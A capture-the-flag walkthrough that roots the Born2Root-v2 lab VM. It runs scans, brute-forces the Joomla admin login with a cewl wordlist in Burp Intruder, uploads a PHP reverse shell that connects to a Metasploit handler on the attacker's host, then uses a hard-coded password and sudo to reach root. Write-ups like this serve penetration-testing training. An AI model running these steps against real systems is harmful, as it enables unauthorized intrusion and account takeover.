Born2Root-v2 Walkthrough

Description

I decided to solve this box, although it’s not really new. The creator of this box didn’t give a proper description, but I suppose the goal is to get root and acquire the flag. I think the difficulty of the box is between beginner and intermediate level.

Scanning

I started with the usual nmap scan. Here is the output of the scan:

root :: ~ » nmap -A -p- 192.168.1.148
Nmap scan report for born2root (192.168.1.148)
Host is up (0.00082s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Welcome to my website
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          41869/udp  status
|_  100024  1          59562/tcp  status
59562/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I started exploring the web server further with nikto and gobuster. It turned out there is a Joomla installation under the joomla directory.

root :: wordlists/web » gobuster -u 192.168.1.148 -w common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.148/
[+] Threads      : 10
[+] Wordlist     : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/27 16:41:34 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/javascript (Status: 301)
/js (Status: 301)
/joomla (Status: 301)
/LICENSE (Status: 200)
/manual (Status: 301)
/server-status (Status: 403)
/vendor (Status: 301)
=====================================================
2019/05/27 16:41:36 Finished
=====================================================
root :: wordlists/web »

Generating a custom wordlist

It looked interesting and I scanned it with a few tools, started searching for exploits etc… but, no luck. I had a feeling that this must be the way in, so I fired up cewl to generate a custom wordlist based on the site. Maybe, I will be successful with a brute force attack on the administrator page.

root :: /opt/cewl » ./cewl.rb -d 3 -w ~/Downloads/passwords.txt http://192.168.1.148/joomla
CeWL 5.4.5 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root :: /opt/cewl » cd
root :: ~ » cd Downloads
root :: ~/Downloads » wc -c passwords.txt
 787 passwords.txt

Well, the script generated 787 possible passwords, which was good enough for me. I navigated to the administrator page, enabled the Burp proxy and started Burp Suite.

I captured the login request and sent it to the Intruder. I cleared the auto-selected payload positions except for the password position.

Then, I loaded the previously created wordlist and loaded it as a simple list and started the attack.

It took a couple of minutes, but it was worth it. I sorted the results by status code, so I could easily see the 200 HTTP responses. I chose one and I was able to successfully log in.

Getting access

My first thought was to upload a reverse shell, which is pretty easy at this point. I clicked on the Templates menu and selected the default Protostar template. You can upload any kind of file, but I uploaded my PHP reverse shell and executed it by navigating to: /joomla/templates/protostar/shell.php

Before doing that I set up my handler using Metasploit. After I got a connection back, I started poking around and looking for privilege escalation vectors.

msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.117
lhost => 192.168.1.117
msf5 exploit(multi/handler) > set lport 9898
lport => 9898
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.117:9898
[*] Sending stage (38247 bytes) to 192.168.1.148
[*] Meterpreter session 1 opened (192.168.1.117:9898 -> 192.168.1.148:50447) at 2019-05-28 15:01:24 +0200

meterpreter > sysinfo
Computer    : born2root
OS          : Linux born2root 3.16.0-6-586 #1 Debian 3.16.56-1 (2018-04-28) i686
Meterpreter : php/linux

Finding a critical file

In the /opt folder, I found an interesting python script, which contained a password.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/env python
import sys, paramiko

if len(sys.argv) < 5:
print "args missing"
sys.exit(1)

hostname = "localhost"
password = "lulzlol"
source = "/var/www/html/joomla"
dest = "/tmp/backup/joomla"

username = "tim"
port = 22

try:
t = paramiko.Transport((hostname, port))
t.connect(username=username, password=password)
sftp = paramiko.SFTPClient.from_transport(t)
sftp.get(source, dest)

finally:
t.close()

Privilege escalation

I upgraded my shell with python so that I can switch user and use this password to log in as tim. By the way, he used the same password for SSH access and it’s easier to work with a fully functional shell, but here I worked my way through with the simple netcat reverse shell.

python -c "import pty;pty.spawn('/bin/bash')"
www-data@born2root:/var/www/html/joomla/templates/protostar$ su tim
Password: lulzlol
tim@born2root:/var/www/html/joomla/templates/protostar$ sudo -l
[sudo] password for tim: lulzlol

Matching Defaults entries for tim on born2root:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tim may run the following commands on born2root:
    (ALL : ALL) ALL

Switching to root

As you can see, tim can run everything as root without needing the root password. Let’s switch to root!

tim@born2root:/var/www/html/joomla/templates/protostar$ sudo su
root@born2root:/var/www/html/joomla/templates/protostar# cd /root
root@born2root:~# ls
flag.txt

Finally, I printed out the one and only flag in the /root directory.

root@born2root:~# cat flag.txt

            .andAHHAbnn.
        .aAHHHAAUUAAHHHAn.
        dHP^~"        "~^THb.
    .   .AHF                YHA.   .
    |  .AHHb.              .dHHA.  |
    |  HHAUAAHAbn      adAHAAUAHA  |
    I  HF~"_____        ____ ]HHH  I
HHI HAPK""~^YUHb  dAHHHHHHHHHH IHH
HHI HHHD> .andHH  HHUUP^~YHHHH IHH
YUI ]HHP     "~Y  P~"     THH[ IUP
    "  `HK                   ]HH'  "
        THAn.  .d.aAAn.b.  .dHHP
        ]HHHHAAUP" ~~ "YUAAHHHH[
        `HHP^~"  .annn.  "~^YHH'
        YHb    ~" "" "~    dHF
        "YAb..abdHHbndbndAP"
        THHAAb.  .adAHHF
            "UHHHHHHHHHHU"
            ]HHUUHHHHHH[
            .adHHb "HHHHHbn.
    ..andAAHHHHHHb.AHHHHHHHAAbnn..
.ndAAHHHHHHUUHHHHHHHHHHUP^~"~^YUHHHAAbn.
"~^YUHHP"   "~^YUHHUP"        "^YUP^"
    ""         "~~"


W00t w00t ! If you are reading this text  then Congratulations !!

I hope you liked the second episode of 'Born2root' if you liked it please ping me in Twitter @h4d3sw0rm .

If you want to try more boxes like this created by me, try this new sweet lab called 'Wizard-Labs' which is a platform which hosts many boot2root machines to improve your pentesting skillset https://labs.wizard-security.net !
Until we meet again :-)

root@born2root:~#

Before you go

If you found this article helpful, please share to help others with similar interest find it! + Feedback and donations are always welcome!